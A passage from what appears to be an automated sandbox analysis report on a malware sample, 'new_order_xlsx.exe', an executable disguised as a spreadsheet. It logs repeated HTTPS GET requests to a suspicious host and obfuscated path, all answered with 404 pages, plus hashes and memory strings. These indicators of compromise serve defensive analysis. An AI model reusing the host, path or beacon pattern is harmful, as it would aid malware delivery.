Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
14          192.168.2.4  49736        185.181.116.217  443               C:\Users\user\Desktop\new_order_xlsx.exe

Timestamp: 2023-09-04 14:38:28 UTC  kBytes transferred: 17  Direction: OUT  Data:
GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: balkancelikdovme.com

Timestamp: 2023-09-04 14:38:29 UTC  kBytes transferred: 18  Direction: IN  Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 708
date: Mon, 04 Sep 2023 14:38:29 GMT
vary: User-Agent
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Timestamp: 2023-09-04 14:38:29 UTC  kBytes transferred: 18  Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
15          192.168.2.4  49737        185.181.116.217  443               C:\Users\user\Desktop\new_order_xlsx.exe

Timestamp: 2023-09-04 14:38:38 UTC  kBytes transferred: 19  Direction: OUT  Data:
GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: balkancelikdovme.com

Timestamp: 2023-09-04 14:38:39 UTC  kBytes transferred: 19  Direction: IN  Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 708
date: Mon, 04 Sep 2023 14:38:39 GMT
vary: User-Agent
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Timestamp: 2023-09-04 14:38:39 UTC  kBytes transferred: 19  Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
16          192.168.2.4  49738        185.181.116.217  443               C:\Users\user\Desktop\new_order_xlsx.exe

Timestamp: 2023-09-04 14:38:48 UTC  kBytes transferred: 20  Direction: OUT  Data:
GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: balkancelikdovme.com

Timestamp: 2023-09-04 14:38:49 UTC  kBytes transferred: 20  Direction: IN  Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 708
date: Mon, 04 Sep 2023 14:38:48 GMT
vary: User-Agent
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Timestamp: 2023-09-04 14:38:49 UTC  kBytes transferred: 21  Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
17          192.168.2.4  49739        185.181.116.217  443               C:\Users\user\Desktop\new_order_xlsx.exe

Timestamp: 2023-09-04 14:38:59 UTC  kBytes transferred: 21  Direction: OUT  Data:
GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: balkancelikdovme.com

Timestamp: 2023-09-04 14:38:59 UTC  kBytes transferred: 22  Direction: IN  Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 708
date: Mon, 04 Sep 2023 14:38:59 GMT
vary: User-Agent
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Timestamp: 2023-09-04 14:38:59 UTC  kBytes transferred: 22  Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
2           192.168.2.4  49723        185.181.116.217  443               C:\Users\user\Desktop\new_order_xlsx.exe

Timestamp: 2023-09-04 14:36:29 UTC  kBytes transferred: 2  Direction: OUT  Data:
GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: balkancelikdovme.com

Timestamp: 2023-09-04 14:36:29 UTC  kBytes transferred: 2  Direction: IN  Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 708
date: Mon, 04 Sep 2023 14:36:29 GMT
vary: User-Agent
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Timestamp: 2023-09-04 14:36:29 UTC  kBytes transferred: 3  Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
3           192.168.2.4  49724        185.181.116.217  443               C:\Users\user\Desktop\new_order_xlsx.exe

Timestamp: 2023-09-04 14:36:39 UTC  kBytes transferred: 3  Direction: OUT  Data:
GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: balkancelikdovme.com

Timestamp: 2023-09-04 14:36:39 UTC  kBytes transferred: 4  Direction: IN  Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 708
date: Mon, 04 Sep 2023 14:36:39 GMT
vary: User-Agent
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Timestamp: 2023-09-04 14:36:39 UTC  kBytes transferred: 4  Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
4           192.168.2.4  49725        185.181.116.217  443               C:\Users\user\Desktop\new_order_xlsx.exe

Timestamp: 2023-09-04 14:36:49 UTC  kBytes transferred: 5  Direction: OUT  Data:
GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: balkancelikdovme.com

Timestamp: 2023-09-04 14:36:49 UTC  kBytes transferred: 5  Direction: IN  Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 708
date: Mon, 04 Sep 2023 14:36:49 GMT
vary: User-Agent
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Timestamp: 2023-09-04 14:36:49 UTC  kBytes transferred: 5  Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
5           192.168.2.4  49726        185.181.116.217  443               C:\Users\user\Desktop\new_order_xlsx.exe

Timestamp: 2023-09-04 14:36:59 UTC  kBytes transferred: 6  Direction: OUT  Data:
GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: balkancelikdovme.com

Timestamp: 2023-09-04 14:36:59 UTC  kBytes transferred: 6  Direction: IN  Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 708
date: Mon, 04 Sep 2023 14:36:59 GMT
vary: User-Agent
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Timestamp: 2023-09-04 14:36:59 UTC  kBytes transferred: 7  Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
6           192.168.2.4  49728        185.181.116.217  443               C:\Users\user\Desktop\new_order_xlsx.exe

Timestamp: 2023-09-04 14:37:09 UTC  kBytes transferred: 7  Direction: OUT  Data:
GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: balkancelikdovme.com

Timestamp: 2023-09-04 14:37:09 UTC  kBytes transferred: 7  Direction: IN  Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 708
date: Mon, 04 Sep 2023 14:37:09 GMT
vary: User-Agent
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Timestamp: 2023-09-04 14:37:09 UTC  kBytes transferred: 8  Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49729 | Destination IP: 185.181.116.217 | Destination Port: 443 | Process: C:\Users\user\Desktop\new_order_xlsx.exe
                    Timestamp | kBytes transferred | Direction | Data
                    2023-09-04 14:37:19 UTC | 8 | OUT | GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:37:19 UTC | 9 | IN | HTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:37:19 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:37:19 UTC | 9 | IN | Data Raw: (hex dump of the response body omitted; decoded ASCII follows)
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49730 | Destination IP: 185.181.116.217 | Destination Port: 443 | Process: C:\Users\user\Desktop\new_order_xlsx.exe
                    Timestamp | kBytes transferred | Direction | Data
                    2023-09-04 14:37:30 UTC | 10 | OUT | GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:37:30 UTC | 10 | IN | HTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:37:30 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:37:30 UTC | 10 | IN | Data Raw: (hex dump of the response body omitted; decoded ASCII follows)
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49731 | Destination IP: 185.181.116.217 | Destination Port: 443 | Process: C:\Users\user\Desktop\new_order_xlsx.exe
                    Timestamp | kBytes transferred | Direction | Data
                    2023-09-04 14:37:39 UTC | 11 | OUT | GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:37:39 UTC | 11 | IN | HTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:37:39 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:37:39 UTC | 12 | IN | Data Raw: (hex dump of the response body omitted; decoded ASCII follows)
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s



                    Target ID: 0
                    Start time: 16:35:55
                    Start date: 04/09/2023
                    Path: C:\Users\user\Desktop\new_order_xlsx.exe
                    Wow64 process (32bit): true
                    Commandline: C:\Users\user\Desktop\new_order_xlsx.exe
                    Imagebase: 0x400000
                    File size: 1'516'544 bytes
                    MD5 hash: EF6025979E7E27041EF72650FDBE8630
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: Borland Delphi
                    Reputation: low
                    Has exited: false

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000003.227119235.000000000355C000.00000004.00001000.00020000.00000000.sdmp, Offset: 0355C000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_3_355c000_new_order_xlsx.jbxd
                      Similarity
                      • API ID:
                      • String ID: $0)@$7$<)@$D)@$L)@
                      • API String ID: 0-3088242726
                      • Opcode ID: 8e42451d48a56f7ccbea89492fea16576adab606abf73f6db0535c3d2d26f603
                      • Instruction ID: fc4555975779f862dffc0225d616a22cefc8f69ae7f3395a3602c24e43f71d74
                      • Opcode Fuzzy Hash: 8e42451d48a56f7ccbea89492fea16576adab606abf73f6db0535c3d2d26f603
                      • Instruction Fuzzy Hash: 04A1E730B043988BDF21DA6CD894BA8B7F4FB49710F1440F6F949AB2A1CB75A9C5CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000003.227119235.000000000355C000.00000004.00001000.00020000.00000000.sdmp, Offset: 0355C000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_3_355c000_new_order_xlsx.jbxd
                      Similarity
                      • API ID:
                      • String ID: $0)@$7$L)@
                      • API String ID: 0-3436765255
                      • Opcode ID: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
                      • Instruction ID: d2b319768b8a54072f8aa7bae45281ae73cdc3f0866a455266091155472b3a84
                      • Opcode Fuzzy Hash: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
                      • Instruction Fuzzy Hash: C271D330B043988BDF21DB2CD894BE8B7F4FB49300F1440E6E949EB291DBB56985CB51
                      Uniqueness

                      Uniqueness Score: -1.00%